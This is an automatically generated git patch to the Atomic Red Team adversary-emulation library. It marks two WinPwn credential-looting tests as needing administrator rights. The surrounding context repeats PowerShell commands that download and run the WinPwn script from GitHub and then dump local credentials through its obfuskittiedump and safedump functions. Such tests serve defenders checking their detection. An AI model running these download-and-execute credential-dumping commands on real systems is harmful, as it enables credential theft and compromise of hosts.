From 464291478b6084fd88e77cb5ef376f2d0aab46c8 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 8 Aug 2022 21:09:36 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 8 ++++++++ atomics/T1078.003/T1078.003.md | 4 ++-- 2 files changed, 10 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 7e4e8a50..f6f95e7f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -26374,6 +26374,7 @@ defense-evasion: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive name: powershell + elevation_required: true - name: WinPwn - Loot local Credentials - Safetykatz auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4 description: Loot local Credentials - Safetykatz technique via function of WinPwn @@ -26385,6 +26386,7 @@ defense-evasion: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive name: powershell + elevation_required: true T1211: technique: x_mitre_platforms: @@ -40633,6 +40635,7 @@ privilege-escalation: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive name: powershell + elevation_required: true - name: WinPwn - Loot local Credentials - Safetykatz auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4 description: Loot local Credentials - Safetykatz technique via function of WinPwn @@ -40644,6 +40647,7 @@ privilege-escalation: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive name: powershell + elevation_required: true T1574.012: technique: x_mitre_platforms: @@ -63222,6 +63226,7 @@ persistence: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive name: powershell + elevation_required: true - name: WinPwn - Loot local Credentials - Safetykatz auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4 description: Loot local Credentials - Safetykatz technique via function of WinPwn @@ -63233,6 +63238,7 @@ persistence: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive name: powershell + elevation_required: true T1574.012: technique: x_mitre_platforms: @@ -99089,6 +99095,7 @@ initial-access: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') obfuskittiedump -consoleoutput -noninteractive name: powershell + elevation_required: true - name: WinPwn - Loot local Credentials - Safetykatz auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4 description: Loot local Credentials - Safetykatz technique via function of WinPwn @@ -99100,6 +99107,7 @@ initial-access: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') safedump -consoleoutput -noninteractive name: powershell + elevation_required: true exfiltration: T1567: technique: diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md index 8107a2ff..226b4bab 100644 --- a/atomics/T1078.003/T1078.003.md +++ b/atomics/T1078.003/T1078.003.md @@ -109,7 +109,7 @@ Loot local Credentials - powerhell kittie technique via function of WinPwn -#### Attack Commands: Run with `powershell`! +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell @@ -139,7 +139,7 @@ Loot local Credentials - Safetykatz technique via function of WinPwn -#### Attack Commands: Run with `powershell`! +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell